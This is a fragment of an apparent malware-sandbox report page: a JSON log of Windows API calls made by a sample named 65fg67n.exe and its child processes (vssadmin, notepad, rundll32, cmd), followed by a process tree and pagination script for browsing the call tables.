17:42:08,140", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,140", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 
17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,140", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,140", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,140", "api": "RegOpenKeyExW"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,150", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetDllHandle"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,150", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetDllHandle"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,150", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,150", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,150", "api": "ZwMapViewOfSection"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,150", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": 
"2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 
17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,150", "api": "FindFirstFileExW"}, 
{"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,150", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,150", "api": "NtQueryDirectoryFile"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": 
"RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", 
"api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,150", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,150", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": 
"RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,160", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,160", "api": 
"ZwMapViewOfSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,160", "api": "ZwMapViewOfSection"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,160", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": 
"RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrLoadDll"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,170", "api": "CreateRemoteThread"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,170", "api": "NtResumeThread"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,170", "api": "NtDelayExecution"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,170", "api": "CreateRemoteThread"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,170", "api": "NtResumeThread"}, {"category": "windows", "timestamp": "2016-02-16 17:42:08,170", "api": "FindWindowA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,180", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,180", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,180", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,180", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,180", "api": "NtReadFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,210", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,210", "api": "ZwMapViewOfSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,220", "api": "ZwMapViewOfSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,220", "api": "ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,220", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrLoadDll"}, {"category": "system", "timestamp": 
"2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,240", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,250", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,250", "api": "NtFreeVirtualMemory"}, {"category": "misc", "timestamp": "2016-02-16 17:42:11,345", "api": "GetSystemMetrics"}, {"category": "threading", "timestamp": "2016-02-16 17:42:48,258", "api": "ExitThread"}, {"category": "registry", "timestamp": "2016-02-16 17:43:05,753", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:43:05,753", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:43:05,753", "api": "RegCloseKey"}]}, {"parent_id": 1592, "process_name": "cmd.exe", "process_id": 296, "first_seen": "2016-02-16 17:42:07,970", "calls": [{"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,250", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,250", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,250", "api": "RegOpenKeyExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,250", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": 
"2016-02-16 17:42:08,250", "api": "RegOpenKeyExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,250", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegOpenKeyExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 
17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,260", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,260", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,260", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,260", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,270", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,270", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,270", "api": "NtQueryValueKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,270", "api": "NtQueryValueKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,270", "api": "LdrGetDllHandle"}, 
{"category": "system", "timestamp": "2016-02-16 17:42:08,270", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,270", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,270", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,270", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,270", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,270", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,310", "api": "DeleteFileW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,310", "api": "NtQueryDirectoryFile"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,310", "api": "LdrGetDllHandle"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,310", "api": "ExitProcess"}]}];
</script>
<hr />

<ul>

<li>
<strong>65fg67n.exe</strong> 1592
<ul>
<li>
<strong>vssadmin.exe</strong> 1840
</li>

<li>
<strong>NOTEPAD.EXE</strong> 592
</li>

<li>
<strong>rundll32.exe</strong> 308
</li>

<li>
<strong>cmd.exe</strong> 296
</li>

</ul>
</li>


</ul>

<script>
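/**
 * Build the <li> markup for one process's pagination bar.
 *
 * The bar always shows page 1 and the last page, plus a window of up to two
 * pages on either side of the current one; any gap is rendered as a "..."
 * item. The link for the current page carries an inline highlight style.
 *
 * Both arguments are concatenated into markup without escaping, so callers
 * must pass numbers (load_chunck runs them through parseInt first).
 *
 * @param {number} pages total number of pages; 0 yields an empty string
 * @param {number} page  1-based number of the page being displayed
 * @returns {string} HTML fragment of <li> elements, meant to fill a <ul>
 */
function paginationbar(pages, page) {
    if (pages === 0) return "";

    // Inline style attribute for the current page's link, empty otherwise.
    function alert_current_page(i, page) {
        if (i == page) return ' style="background-color: #D9EDF7"';
        return '';
    }

    // Declared locally: the original loop assigned to an undeclared `i`, which
    // creates a global in sloppy mode and throws in strict mode.
    var i;
    var out = '';

    // First page is always present.
    out += '<li><a' + alert_current_page(1, page) + ' href="#">1</a></li>';

    // Gap between page 1 and the start of the window.
    if (page - 2 > 2) out += '<li><span>...</span></li>';

    // Window around the current page, clamped so it never repeats the first
    // or the last page.
    for (i = Math.max(2, page - 2); i <= Math.min(pages - 1, page + 2); i++) {
        out += '<li><a' + alert_current_page(i, page) + ' href="#">' + i + '</a></li>';
    }

    // Gap between the end of the window and the last page.
    if (page + 2 < pages - 1) out += '<li><span>...</span></li>';

    // Last page, unless it is also the first.
    if (pages > 1)
        out += '<li><a' + alert_current_page(pages, page) + ' href="#">' + pages + '</a></li>';
    return out;
}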
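/**
 * Fetch one page of a process's API-call table and redraw its pagination bars.
 *
 * @param {number} pid     process id; selects the #process_<pid> tab pane
 * @param {number} pagenum 1-based page of the call table to request
 */
function load_chunck(pid, pagenum) {
    var pane = "#process_" + pid;

    // NOTE(review): .load() inserts the response into the page as HTML. The
    // rows describe what the analysed sample did (names, arguments), so the
    // /analysis/chunk/ endpoint must return them already HTML-escaped. That
    // is not visible from this page; confirm it server-side.
    $(pane + " div.calltable").load("/analysis/chunk/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/" + pid + "/" + pagenum + "/", function (data, status, xhr) {
        if (status == "error") {
            $(pane + " div.calltable").html("Error loading data. Please reload the page and if the error persists contact us.");
            return;
        }

        // data-length on the pane is passed to paginationbar as the page count.
        // Both pagination bars of the pane (above and below the table) are
        // redrawn, which also discards the previous links and their handlers.
        $(pane + " div.pagination ul").html(paginationbar(parseInt($(pane).data('length'), 10), pagenum));
        $(pane + " div.pagination a").click(function (e) {
            // The links are href="#" placeholders; without this the browser
            // follows the empty fragment and scrolls back to the top.
            e.preventDefault();
            var t = $(e.target);
            // The link text is the page number written by paginationbar.
            load_chunck(t.parents(pane).data('pid'), parseInt(t.text(), 10));
        });
    });
}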
</script>

<div class="tabbable">
<ul class="nav nav-tabs">
<li class="active"><a href="#process_1592" data-toggle="tab">65fg67n.exe</a></li>
<li ><a href="#process_1840" data-toggle="tab">vssadmin.exe</a></li>
<li ><a href="#process_592" data-toggle="tab">NOTEPAD.EXE</a></li>
<li ><a href="#process_308" data-toggle="tab">rundll32.exe</a></li>
<li ><a href="#process_296" data-toggle="tab">cmd.exe</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane active" id="process_1592" data-pid="1592" data-length="299">
<div class="alert alert-info" style="text-align: center;"><b>65fg67n.exe</b>, PID: <b>1592</b>, Parent PID: 1796</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
